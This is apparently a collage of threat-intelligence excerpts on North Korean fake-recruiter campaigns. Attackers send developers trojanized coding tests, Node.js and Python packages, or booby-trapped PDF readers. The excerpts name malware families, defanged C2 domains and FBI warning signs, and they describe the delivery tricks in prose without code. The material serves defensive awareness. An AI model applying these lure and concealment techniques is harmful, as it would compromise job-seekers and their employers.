"Crypto folks (hopefully) already know that Lazarus is one of the most prevalent threat actors targeting this industry..."
Hacking Group Known as “Andariel” Used Ransom Proceeds to Fund Theft of Sensitive Information from Defense and Technology Organizations Worldwide, Including U.S. Government Agencies
The FBI has observed the following list of potential indicators of North Korean social engineering activity:
Requests to execute code or download applications on company-owned devices or other devices with access to a company’s internal network.
Requests to conduct a "pre-employment test" or debugging exercise that involves executing non-standard or unknown Node.js packages, PyPI packages, scripts, or GitHub repositories.
Offers of employment from prominent cryptocurrency or technology firms that are unexpected or involve unrealistically high compensation without negotiation.
Offers of investment from prominent companies or individuals that are unsolicited or have not been proposed or discussed previously.
Insistence on using non-standard or custom software to complete simple tasks easily achievable through the use of common applications (i.e. video conferencing or connecting to a server).
Requests to run a script to enable call or video teleconference functionalities supposedly blocked due to a victim's location.
Requests to move professional conversations to other messaging platforms or applications.
Unsolicited contacts that contain unexpected links or attachments.
Crypto exchange heists typically involve a series of events that map to the Targeted Attack Lifecycle. Recent findings from Mandiant heist investigations have identified social engineering of developers via fake job recruiting with coding tests as a common initial infection vector. The following screenshots (Figure 1) are from a recent heist investigation where an engineer was contacted about a fake job opportunity via LinkedIn by a DPRK threat actor. After an initial chat conversation, the attacker sent a ZIP file that contained COVERTCATCH malware disguised as a Python coding challenge, which compromised the user’s macOS system by downloading a second-stage malware that persisted via Launch Agents and Launch Daemons.
Recently, Mandiant observed a similar recruiting theme which delivered a malicious PDF disguised as a job description for “VP of Finance and Operations” at a prominent crypto exchange. The malicious PDF dropped a second-stage malware known as RUSTBUCKET which is a backdoor written in Rust that supports file execution. The backdoor collects basic system information, communicates to a URL provided via the command-line, and in this instance persisted, via a Launch Agent disguised as “Safari Update” with a command-and-control (C2 or C&C) domain autoserverupdate[.]line[.]pm.
The following snippet shows example decrypted AWS EC2 SSM Parameters identified in AWS CloudTrail logs from a heist investigation. These decrypted SSM Parameters included the private keys, usernames, and passwords for an exchange’s production cryptocurrency wallets. Approximately one hour later the wallets were drained resulting in a loss of over $100 million.
APT Lazarus: Eager Crypto Beavers, Video calls and Games
Recent Python scripts, including the CivetQ and BeaverTail malware variants, along with their updated versions in Windows and Python releases
Campaign begins with a fictitious job interview, tricking job-seekers into downloading and running a Node.js project which contains the BeaverTail malware, which in turn delivers the Python backdoor known as InvisibleFerret. BeaverTail was first discovered by PANW researchers as a Javascript malware in November 2023, but recently a native macOS version of BeaverTail was discovered in July 2024.
Actively searching for potential victims on other job search platforms such as WWR, Moonlight, Upwork,and others
freeconference[.]io
mirotalk[.]net
The malicious Javascript code is buried within these repositories. The following are examples of a trojanized repository, where the node server/server.js command was added to the “scripts” property in package.json. Here, server/server.js serves as the initial entry point, which in turn loads the malicious script in middlewares/helpers/error.js.
Lazarus has been used in public reporting as an umbrella term for threat actors from the Democratic People's Republic of Korea (DPRK), commonly referred to as North Korea. However, many of these threat actors can be classified into different groups under the Reconnaissance General Bureau (RGB) of the Korean People's Army.
Over the years, the RGB has revealed at least six threat groups
New, malicious software packages believe to be linked to a campaign, VMConnect, first identified in August 2023
New samples were tracked to GitHub projects that have been linked to previous, targeted attacks in which developers are lured using fake job interviews. Furthermore, information gathered from the detected samples allowed us to identify one compromised developer and provided insights into an ongoing campaign, with attackers posing as employees of major financial services firms.
The malicious code was contained in altered pyperclip and pyrebase modules. The malicious code is present in both the init.py file and its corresponding compiled Python file (PYC) inside the pycache directory of respective modules.
Searching open source information for the name led us to a GitHub profile of the developer. After establishing contact with the developer, we confirmed that he had fallen victim to the malicious actor pretending to be a recruiter from Capital One in January, 2024. In an email exchange with ReversingLabs, he revealed that he had been contacted from a LinkedIn profile and provided with a link to the GitHub repository as a “homework task.” The developer was asked to “find the bug,” resolve it and push changes that addressed the bug. When the changes were pushed, the fake recruiter asked him to send screenshots of the fixed bug — to make sure that developer executed the project on his machine.
On September 3, 2024 the Federal Bureau of Investigations (FBI) released a public service announcement set to warn those in the Crypto Industry that the Democratic People's Republic of Korea ("DPRK" aka North Korea) has been targeting individuals by using clever social engineering techniques for the successful delivery of malware.
Humans have long been considered the weakest link in the cybersecurity chain, and attackers continue to exploit this vulnerability through increasingly sophisticated social engineering tactics. Social engineering schemes often target individuals through professional networking platforms, making users the first line of defense but also the most vulnerable.
“The actors may also impersonate recruiting firms or technology companies backed by professional websites designed to make the fake entities appear legitimate.”
Requests to conduct a "pre-employment test" or debugging exercise that involves executing non-standard or unknown Node.js packages, PyPI packages, scripts, or GitHub repositories.
Mandiant: An Offer You Can Refuse: UNC2970 Backdoor Deployment Using Trojanized PDF Reader
Mandiant Managed Defense has reported similar activity in 2022 attributed to UNC4034, which later got merged into UNC2970.
UNC2970 targets victims under the guise of job openings, masquerading as a recruiter for prominent companies. Mandiant has observed UNC2970 copy and tailor job descriptions to fit their respective targets.
UNC2970 engaged with the victim over email and WhatsApp and ultimately shared a malicious archive that is purported to contain the job description in PDF file format. The PDF file has been encrypted and can only be opened with the included trojanized version of SumatraPDF to ultimately deliver MISTPEN backdoor via BURNBOOK launcher.
Mandiant observed UNC2970 modify the open source code of an older SumatraPDF version as part of this campaign. This is not a compromise of SumatraPDF, nor is there any inherent vulnerability in SumatraPDF. Upon discovery, Mandiant alerted SumatraPDF of this campaign for general awareness.
UNC2970 relies on legitimate job description content to target victims employed in U.S. critical infrastructure verticals. The job description is delivered to the victim in a password-protected ZIP archive containing an encrypted PDF file and a modified version of an open-source PDF viewer application.
For example, under the "Required Education, Experience, & Skills" section, the original post mentions "United States Air Force or highly comparable experience," while the malicious PDF omits this line. Another omitted line is under the "Preferred Education, Experience, & Skills" section, where the original job description includes "Preferred location McLean, Virginia."
BAE_VICE President of Business Development.pdf - An encrypted file containing both the PDF lure displayed to the user and the MISTPEN backdoor
libmupdf.dllPdfFilter.dllSumatraPDF.exe
This MISTPEN sample communicates over HTTP with the following Microsoft Graph URLs:
The backdoor reads configuration data from the file setup.bin if it exists within the same directory. The configuration data includes the sleep time and an ID. The backdoor sleeps for the configured time and sends the message "Hi,I m just woke up!" to its command-and-control (C2 or C&C) server.
Code of Conduct: DPRK’s Python- fueled intrusions into secured networks
Investigating the DPRK’s strategic use of Python and carefully crafted social engineering, this publication sheds light on how they breach highly secure networks with evolving and effective cyber attacks.
The main PasswordManager.py file looks like the makings of a basic Python password manager application. Of course, as we noted above, the application imports two third-party modules (Pyperclip and Pyrebase) into this main script.
The script within the Pyperclip package exhibits clear signs of malicious behavior, using obfuscation techniques like ROT13 and Base64 encoding to hide its true intent. It identifies the operating system and adapts its actions accordingly, writing to disk and executing an obfuscated Python script in the system’s temporary directory. The script establishes communication with a remote server, enabling remote code execution (RCE) and allowing the attacker to send further commands. This carefully concealed process ensures the script runs stealthily, avoiding detection while maintaining effective C2 (Command and Control) over the infected machine.
This lure again masquerades as a Python coding challenge delivered under the guise of a job interview. Its Python code implementation matches exactly the code we’ve analyzed above, and based on description and filename, it matches the lure described by Mandiant as “CovertCatch.”
The next lure is different from the previous ones but matches the Python code implementation we have seen and written about previously. Last year, we brought to light the malware known as “KandyKorn” that targeted CryptoCurrency developers and engineers.
Mandiant: UNC5267 - Staying a Step Ahead: Mitigating the DPRK IT Worker Threat
UNC5267 is not a traditional, centralized threat group. IT workers consist of individuals sent by the North Korean government to live primarily in China and Russia, with smaller numbers in Africa and Southeast Asia. Their mission is to secure lucrative jobs within Western companies, especially those in the U.S. tech sector.
Financial gain through illicit salary withdrawals from compromised companies
Maintaining long-term access to victim networks for potential future financial exploitation
Potential use of access for espionage or disruptive activity (though this hasn't been definitively observed)